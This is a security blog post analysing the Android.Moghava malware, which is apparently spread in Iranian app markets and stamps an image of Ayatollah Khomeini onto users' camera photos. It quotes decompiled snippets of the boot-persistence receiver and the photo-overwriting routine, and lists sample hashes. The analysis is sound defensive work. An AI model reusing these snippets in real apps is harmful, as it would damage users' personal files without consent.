Detailed Analysis of Android.Moghava

Intro: What is Android.Moghava?

This new malware-family emerged some days ago in third-party Iranian Android-Markets. It is one of the very few samples out there that is not intended to make money. Instead, the app represents another sample from the side of politically-motivated hacking (hacktivism) which modifies images that are stored on the device.

Even if this malicious app doesn’t cause any financial loss to the user of the smartphone, all the pictures on the smartphone are compromised.

Unfortunately, the sample which was submitted to our mobile-sandbox is not signed, so we couldn’t run it in our emulator and the rest of this analysis is made by looking directly in the decompiled code of the application.

Analysis of the Application and Its Structure

When installing the app it is requests the following permissions:

  • android.permission.WRITE_EXTERNAL_STORAGE
  • android.permission.RECEIVE_BOOT_COMPLETED

The application consist of two packages:

  • the benign part of the app: ir.sharif.iranianfoods
  • and the malicious part: com.Moghava

As it is very obvious that this is another repackaged app, we concentrated our analysis on the second package which has two classes, we will look at in the next sections.

com.Moghava.kicker

This class is called when the smartphone receives a “boot completed” and calls the second class of the malicious package (see the code snippet below).

public void onReceive(Context paramContext, Intent paramIntent){
   if ("android.intent.action.BOOT_COMPLETED".equals(paramIntent.getAction())){
      paramContext.startService(new Intent(paramContext, stamper.class));
   }
}

com.Moghava.stamper

This class is responsible for the malicious action of the application. First it tries to receive a list with every picture of your phone. This action runs in the background in regular intervals.

File[] arrayOfFile = new File("/sdcard/DCIM/Camera/").listFiles(new FilenameFilter(){
   public boolean accept(File paramFile, String paramString){
      return paramString.endsWith(".jpg");
   }
...

The application is only checking the /sdcard/DCIM/Camera/ folder, so on newer smartphones like the Samsung Galaxy S2 it isn’t getting all of your photos. On these smartphones the photos are often stored in /sdcard/external_sd/DCIM/Camera/.

After the application has received the list with all pictures inside this directory, it tries to modify them by merging the picture with a picture of Ayatollah Khomeini. Since the app isn’t checking if the picture is already compromised it does this action over and over again till the storage becomes full.

localBitmap1 = BitmapFactory.decodeResource(stamper.this.getResources(), 2130837505);
localBitmap2 = BitmapFactory.decodeFile(localFile.getPath());
if (localBitmap2.getWidth() > localBitmap1.getWidth()){
   k = localBitmap2.getWidth();
   n = localBitmap2.getHeight();
   localBitmap3 = Bitmap.createBitmap(k, n, Bitmap.Config.ARGB_8888);
   Canvas localCanvas = new Canvas(localBitmap3);
   localCanvas.drawBitmap(localBitmap2, 0.0F, 0.0F, null);
   localCanvas.drawBitmap(localBitmap1, 100.0F, 300.0F, null);
}


Sample Information:

sha256:
94bb6ade1ef31c6c96b98c7d8fad1abbc794292730f4363ea3cd9204fc5c9dfd

md5:
ec86f084ea0e0d0a33d5f39df19bd7be

Mobile-Sandbox Report

4 Replies to “Detailed Analysis of Android.Moghava”

  1. “Unfortunately, the sample which was submitted to our mobile-sandbox is not signed, so we couldn’t run it in our emulator…”

    Why does it matter if the .apk is signed or not, to run it within an emulator (or any other physical Android device)?

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.